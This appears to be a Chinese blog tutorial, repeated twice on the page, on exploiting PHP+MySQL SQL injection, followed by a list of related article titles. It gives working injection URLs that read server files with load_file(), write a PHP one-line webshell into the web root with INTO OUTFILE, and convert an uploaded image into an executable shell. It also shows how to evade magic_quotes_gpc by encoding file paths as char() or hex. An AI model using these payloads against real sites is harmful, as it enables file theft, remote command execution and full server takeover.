HPH+Mysql注入点利用 读取文件内容和导出一句话木马
2009-12-15 16:52
821 查看
一、Php+Mysql读取制定文件内容,Mysql版本6.0.8
1、创建临时表Create table a(cmd text);2、读取制定文件,输出文件内容到临时表load data infile 'c:\\boot.ini' into table a;3、读取临时表的内容Select * from a;注入过程中也可以通过联合查询和load_file()函数读取文件内容Sql语句:Select username,password from admin and 1=2 union select 1, load_file(‘c:\boot.ini’)注入举例:http://192.168.0.106/test.php?id=2%20and%201=2%20union%20select%201,load_file('c:\\boot.ini')
二、导出一句话木马假设表a的存放了php一句话木马<?php system($cmd);?>Sql 语句 select cmd from a into outfile ‘C:\cmd.php’可以使用联合查询导出制定表里的内容Sql语句:Select username,password from admin and 1=2 union select 1,cmd from a into outfile ‘C:\CMD.PHP’注入举例:http://192.168.0.106/test.php?id=2%20and%201=2%20union%20select%201,%20cmd%20from%20a%20into%20outfile%20'e:\\www\\cmd.php'
三、更改图片类型的木马为php类型的木马假设我们可以上传图片,或者txt,zip,等其它东西,我们把我们的木马改成 jpg缀的,上传后路径为/upload/2004091201.jpg,2004091201.jpg中的内容为 <?php system($cmd) ?>Sql语句:Select username,password from admin and 1=2 union select 1,load_file(‘e:\www\cmd.jpg’) from a into outfile ‘e:\www\cmd.php’注入举例:http://192.168.0.106/test.php?id=2%20and%201=2%20union%20select%201,load_file('e:\\www\\cmd.jpg')%20from%20a%20into%20outfile%20'e:\\www\\cmd.php'
四、注入注意事项[align=left]在magic_quotes_gpc=On的情况下功能强大的load_file()还能不能用呢? 这正是我们下面要将的问题了,load_file()的使用格式是load_file(‘文件路径’) ,我们发现只要把‘文件路径’转化成char()就可以了,load_file(‘c:/boot.ini’)转化成 ,load_file(char(99,58,47,98,111,111,116,46,105,110,105)) ,或者使用两个\\,过滤掉一个还剩一个,也可以将load_file函数的内容转换成16 进制,例如C:/apache/htdocs/site/lib/sql.inc.php'转化为16进制为:0x433A2F6170616368652F6874646F63732F736974652F6C69622F73716C2E696E[/align]还有显示文件内容的字段不能是数字型的,一定要文本类型的。 本文出自 “ynhu33” 博客,请务必保留此出处http://ynhu33.blog.51cto.com/412835/243971
1、创建临时表Create table a(cmd text);2、读取制定文件,输出文件内容到临时表load data infile 'c:\\boot.ini' into table a;3、读取临时表的内容Select * from a;注入过程中也可以通过联合查询和load_file()函数读取文件内容Sql语句:Select username,password from admin and 1=2 union select 1, load_file(‘c:\boot.ini’)注入举例:http://192.168.0.106/test.php?id=2%20and%201=2%20union%20select%201,load_file('c:\\boot.ini')
二、导出一句话木马假设表a的存放了php一句话木马<?php system($cmd);?>Sql 语句 select cmd from a into outfile ‘C:\cmd.php’可以使用联合查询导出制定表里的内容Sql语句:Select username,password from admin and 1=2 union select 1,cmd from a into outfile ‘C:\CMD.PHP’注入举例:http://192.168.0.106/test.php?id=2%20and%201=2%20union%20select%201,%20cmd%20from%20a%20into%20outfile%20'e:\\www\\cmd.php'
三、更改图片类型的木马为php类型的木马假设我们可以上传图片,或者txt,zip,等其它东西,我们把我们的木马改成 jpg缀的,上传后路径为/upload/2004091201.jpg,2004091201.jpg中的内容为 <?php system($cmd) ?>Sql语句:Select username,password from admin and 1=2 union select 1,load_file(‘e:\www\cmd.jpg’) from a into outfile ‘e:\www\cmd.php’注入举例:http://192.168.0.106/test.php?id=2%20and%201=2%20union%20select%201,load_file('e:\\www\\cmd.jpg')%20from%20a%20into%20outfile%20'e:\\www\\cmd.php'
四、注入注意事项[align=left]在magic_quotes_gpc=On的情况下功能强大的load_file()还能不能用呢? 这正是我们下面要将的问题了,load_file()的使用格式是load_file(‘文件路径’) ,我们发现只要把‘文件路径’转化成char()就可以了,load_file(‘c:/boot.ini’)转化成 ,load_file(char(99,58,47,98,111,111,116,46,105,110,105)) ,或者使用两个\\,过滤掉一个还剩一个,也可以将load_file函数的内容转换成16 进制,例如C:/apache/htdocs/site/lib/sql.inc.php'转化为16进制为:0x433A2F6170616368652F6874646F63732F736974652F6C69622F73716C2E696E[/align]还有显示文件内容的字段不能是数字型的,一定要文本类型的。 本文出自 “ynhu33” 博客,请务必保留此出处http://ynhu33.blog.51cto.com/412835/243971
相关文章推荐
- 小迪教程第五天——Php+mysql注入(文件读取,文件导出)
- 利用stringstream将文件中的内容一行行读取并输出出来
- 利用Java的FileReader类读取文件内容的简单例子
- C#利用MySQL的BLOB存储和读取文件和对象
- 读取hdfs文件内容导入mysql(续)
- 存储过程导出csv文件,利用xml对csv文件内容进行批量处理
- 如何将navicat for mysql 中查询出来的内容导出到xls文件中
- MYSQL注入中导出可执行文件至启动项原理及实例
- 利用FileReader.readAsText()读取文件内容并保存到服务器
- [MySQL]利用apache第三方jar包,编写的的JDBCUtils工具类过程及内容详解.附带配置文件的详细注解.
- 浅谈MySQL导出一句话木马拿WebShell的方法-只需要一句SQL
- PHP利用PHPExcel插件读取Excel文件内容
- MySQL注入中导出字段内容的研究通过注入导出WebShell
- 利用 HDFS 的 URL 方式读取 HDFS 内文件内容
- linux(ubuntu) mysql 内容导出到配置文件
- perl 利用管道读取压缩文件内容
- spingmvc的外置properties文件读取(java循环利用properties内容)
- 利用SwingWorker,从文件中读取内容,显示到JTextArea中
- SpringMVC(11):利用数据流InputStream 读取调用 database.properties 配置文件的内容及实例
- Java利用SMB上传、下载、读取(内容或文件名)、复制、删除远程文件